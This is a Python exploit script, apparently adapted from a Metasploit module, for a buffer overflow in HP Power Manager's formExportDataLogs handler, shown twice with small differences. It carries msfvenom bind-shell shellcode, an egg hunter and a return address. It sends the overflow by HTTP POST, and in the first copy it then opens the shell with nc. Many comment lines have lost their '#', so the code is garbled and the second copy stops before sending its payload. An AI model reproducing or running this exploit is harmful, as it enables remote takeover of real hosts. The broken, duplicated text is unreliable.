#!/usr/bin/python
print ("""
##//#############################################################################################################
##
Vulnerability: HP Power Manager 'formExportDataLogs' ## FormExportDataLogs Buffer Overflow
## HP Power Manager
Vulnerable Application: HP Power Manager ## This is a part of the Metasploit Module,
Tested on Windows [Version 6.1.7600] ## exploit/windows/http/hp_power_manager_filename
##
Author: Muhammad Haidari ## Spawns a shell to same window
##
##//#############################################################################################################
TODO: adjust
Usage: python hpm_exploit.py
""")
import urllib
import os
import sys
import struct
import time
from socket import *
try:
HOST = sys.argv[1]
except IndexError:
print ("Usage: %s HOST" % sys.argv[0])
sys.exit()
PORT = 80
#msfvenom -p windows/shell_bind_tcp LHOST=192.168.45.209 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c' -f python
Note: Updated badchars to include the ones from your original
buf = b""
buf += b"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x82\x8e\x95\xe3\x83\xee\xfc\xe2\xf4"
buf += b"\x7e\x66\x17\xe3\x82\x8e\xf5\x6a\x67\xbf\x55\x87"
buf += b"\x09\xde\xa5\x68\xd0\x82\x1e\xb1\x96\x05\xe7\xcb"
buf += b"\x8d\x39\xdf\xc5\xb3\x71\x39\xdf\xe3\xf2\x97\xcf"
buf += b"\xa2\x4f\x5a\xee\x83\x49\x77\x11\xd0\xd9\x1e\xb1"
buf += b"\x92\x05\xdf\xdf\x09\xc2\x84\x9b\x61\xc6\x94\x32"
buf += b"\xd3\x05\xcc\xc3\x83\x5d\x1e\xaa\x9a\x6d\xaf\xaa"
buf += b"\x09\xba\x1e\xe2\x54\xbf\x6a\x4f\x43\x41\x98\xe2"
buf += b"\x45\xb6\x75\x96\x74\x8d\xe8\x1b\xb9\xf3\xb1\x96"
buf += b"\x66\xd6\x1e\xbb\xa6\x8f\x46\x85\x09\x82\xde\x68"
buf += b"\xda\x92\x94\x30\x09\x8a\x1e\xe2\x52\x07\xd1\xc7"
buf += b"\xa6\xd5\xce\x82\xdb\xd4\xc4\x1c\x62\xd1\xca\xb9"
buf += b"\x09\x9c\x7e\x6e\xdf\xe6\xa6\xd1\x82\x8e\xfd\x94"
buf += b"\xf1\xbc\xca\xb7\xea\xc2\xe2\xc5\x85\x71\x40\x5b"
buf += b"\x12\x8f\x95\xe3\xab\x4a\xc1\xb3\xea\xa7\x15\x88"
buf += b"\x82\x71\x40\x89\x8a\xd7\xc5\x01\x7f\xce\xc5\xa3"
buf += b"\xd2\xe6\x7f\xec\x5d\x6e\x6a\x36\x15\xe6\x97\xe3"
buf += b"\x93\xd2\x1c\x05\xe8\x9e\xc3\xb4\xea\x4c\x4e\xd4"
buf += b"\xe5\x71\x40\xb4\xea\x39\x7c\xdb\x7d\x71\x40\xb4"
buf += b"\xea\xfa\x79\xd8\x63\x71\x40\xb4\x15\xe6\xe0\x8d"
buf += b"\xcf\xef\x6a\x36\xea\xed\xf8\x87\x82\x07\x76\xb4"
buf += b"\xd5\xd9\xa4\x15\xe8\x9c\xcc\xb5\x60\x73\xf3\x24"
buf += b"\xc6\xaa\xa9\xe2\x83\x03\xd1\xc7\x92\x48\x95\xa7"
buf += b"\xd6\xde\xc3\xb5\xd4\xc8\xc3\xad\xd4\xd8\xc6\xb5"
buf += b"\xea\xf7\x59\xdc\x04\x71\x40\x6a\x62\xc0\xc3\xa5"
buf += b"\x7d\xbe\xfd\xeb\x05\x93\xf5\x1c\x57\x35\x75\xfe"
buf += b"\xa8\x84\xfd\x45\x17\x33\x08\x1c\x57\xb2\x93\x9f"
buf += b"\x88\x0e\x6e\x03\xf7\x8b\x2e\xa4\x91\xfc\xfa\x89"
buf += b"\x82\xdd\x6a\x36"
Add egg tag before shellcode (b33fb33f) - convert egg_tag to bytes
egg_tag = b"b33fb33f" # Make this bytes by adding b prefix
shellcode = egg_tag + buf # Now both are bytes
#tools/exploit/egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\$%\x1a' -e b33f -v 'hunter'
hunter = ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Calculate buffer size - need to reach return address
Return address from original: 0x4174d5 (pop esi # pop ebx # ret 10 from DevManBE.exe)
ret_addr = struct.pack("<L", 0x004174d5) # Properly packed for little-endian
Build the buffer - keep everything as strings
721 bytes total to return address
buffer = "\x41" * (721 - len(hunter) - 30) # Adjust for hunter and NOPs
buffer += "\x90" * 30 # NOP sled
buffer += hunter # Egg hunter (string)
buffer += "\x90" * 4 # Small NOP sled before return
buffer += ret_addr.decode('latin-1') # Convert bytes to string for concatenation
Use urllib.parse.quote_plus for Python 3
Check if we're using Python 2 or 3 for urllib
if sys.version_info[0] == 3:
import urllib.parse
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.parse.quote_plus(buffer)
else:
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.quote_plus(buffer)
content += "&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"
shellcode is bytes, need to decode to string for HTTP header
shellcode_str = shellcode.decode('latin-1')
payload = "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % shellcode_str # Shellcode with egg tag in Accept header
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] Payload Fired... Waiting for shell...")
# Encode the entire payload to bytes for sending
if sys.version_info[0] == 3:
s.send(payload.encode('latin-1'))
else:
s.send(payload)
s.close()
print("[+] Give it 30 seconds...")
time.sleep(30)
print("[+] Attempting to connect to bindshell on port 4444...")
os.system("nc -nv " + HOST + " 4444")
except Exception as e:
print("[-] Error: %s" % str(e))
sys.exit(1)
print("[+] Exploit completed. Check if you got your shell!")
#!/usr/bin/python
print ("""
##//#############################################################################################################
##
Vulnerability: HP Power Manager 'formExportDataLogs' ## FormExportDataLogs Buffer Overflow
## HP Power Manager
Vulnerable Application: HP Power Manager ## This is a part of the Metasploit Module,
Tested on Windows [Version 6.1.7600] ## exploit/windows/http/hp_power_manager_filename
##
Author: Muhammad Haidari ## Spawns a shell to same window
Contact: ghmh@outlook.com ##
Website: www.github.com/muhammd ##
##
##//#############################################################################################################
TODO: adjust
Usage: python hpm_exploit.py
""")
import urllib
import os
import sys
import struct
import time
from socket import *
try:
HOST = sys.argv[1]
except IndexError:
print ("Usage: %s HOST" % sys.argv[0])
sys.exit()
PORT = 80
#msfvenom -p windows/shell_bind_tcp LHOST=192.168.45.209 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c' -f python
Note: Updated badchars to include the ones from your original
buf = b""
buf += b"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x82\x8e\x95\xe3\x83\xee\xfc\xe2\xf4"
buf += b"\x7e\x66\x17\xe3\x82\x8e\xf5\x6a\x67\xbf\x55\x87"
buf += b"\x09\xde\xa5\x68\xd0\x82\x1e\xb1\x96\x05\xe7\xcb"
buf += b"\x8d\x39\xdf\xc5\xb3\x71\x39\xdf\xe3\xf2\x97\xcf"
buf += b"\xa2\x4f\x5a\xee\x83\x49\x77\x11\xd0\xd9\x1e\xb1"
buf += b"\x92\x05\xdf\xdf\x09\xc2\x84\x9b\x61\xc6\x94\x32"
buf += b"\xd3\x05\xcc\xc3\x83\x5d\x1e\xaa\x9a\x6d\xaf\xaa"
buf += b"\x09\xba\x1e\xe2\x54\xbf\x6a\x4f\x43\x41\x98\xe2"
buf += b"\x45\xb6\x75\x96\x74\x8d\xe8\x1b\xb9\xf3\xb1\x96"
buf += b"\x66\xd6\x1e\xbb\xa6\x8f\x46\x85\x09\x82\xde\x68"
buf += b"\xda\x92\x94\x30\x09\x8a\x1e\xe2\x52\x07\xd1\xc7"
buf += b"\xa6\xd5\xce\x82\xdb\xd4\xc4\x1c\x62\xd1\xca\xb9"
buf += b"\x09\x9c\x7e\x6e\xdf\xe6\xa6\xd1\x82\x8e\xfd\x94"
buf += b"\xf1\xbc\xca\xb7\xea\xc2\xe2\xc5\x85\x71\x40\x5b"
buf += b"\x12\x8f\x95\xe3\xab\x4a\xc1\xb3\xea\xa7\x15\x88"
buf += b"\x82\x71\x40\x89\x8a\xd7\xc5\x01\x7f\xce\xc5\xa3"
buf += b"\xd2\xe6\x7f\xec\x5d\x6e\x6a\x36\x15\xe6\x97\xe3"
buf += b"\x93\xd2\x1c\x05\xe8\x9e\xc3\xb4\xea\x4c\x4e\xd4"
buf += b"\xe5\x71\x40\xb4\xea\x39\x7c\xdb\x7d\x71\x40\xb4"
buf += b"\xea\xfa\x79\xd8\x63\x71\x40\xb4\x15\xe6\xe0\x8d"
buf += b"\xcf\xef\x6a\x36\xea\xed\xf8\x87\x82\x07\x76\xb4"
buf += b"\xd5\xd9\xa4\x15\xe8\x9c\xcc\xb5\x60\x73\xf3\x24"
buf += b"\xc6\xaa\xa9\xe2\x83\x03\xd1\xc7\x92\x48\x95\xa7"
buf += b"\xd6\xde\xc3\xb5\xd4\xc8\xc3\xad\xd4\xd8\xc6\xb5"
buf += b"\xea\xf7\x59\xdc\x04\x71\x40\x6a\x62\xc0\xc3\xa5"
buf += b"\x7d\xbe\xfd\xeb\x05\x93\xf5\x1c\x57\x35\x75\xfe"
buf += b"\xa8\x84\xfd\x45\x17\x33\x08\x1c\x57\xb2\x93\x9f"
buf += b"\x88\x0e\x6e\x03\xf7\x8b\x2e\xa4\x91\xfc\xfa\x89"
buf += b"\x82\xdd\x6a\x36"
Add egg tag before shellcode (b33fb33f) - convert egg_tag to bytes
egg_tag = b"b33fb33f" # Make this bytes by adding b prefix
shellcode = egg_tag + buf # Now both are bytes
#tools/exploit/egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\$%\x1a' -e b33f -v 'hunter'
hunter = ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Calculate buffer size - need to reach return address
Return address from original: 0x4174d5 (pop esi # pop ebx # ret 10 from DevManBE.exe)
ret_addr = struct.pack("<L", 0x004174d5) # Properly packed for little-endian
Build the buffer - keep everything as strings
721 bytes total to return address
buffer = "\x41" * (721 - len(hunter) - 30) # Adjust for hunter and NOPs
buffer += "\x90" * 30 # NOP sled
buffer += hunter # Egg hunter (string)
buffer += "\x90" * 4 # Small NOP sled before return
buffer += ret_addr.decode('latin-1') # Convert bytes to string for concatenation
Use urllib.parse.quote_plus for Python 3
Check if we're using Python 2 or 3 for urllib
if sys.version_info[0] == 3:
import urllib.parse
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.parse.quote_plus(buffer)
else:
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.quote_plus(buffer)
content += "&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"
shellcode is bytes, need to decode to string for HTTP header
shellcode_str = shellcode.decode('latin-1')
payload = "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % shellcode_str # Shellcode with egg tag in Accept header
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] Payload Fired... Waiting for shell...")
except Exception as e:
print("[-] Error: %s" % str(e))
sys.exit(1)
print("[+] Exploit completed. Check if you got your shell!")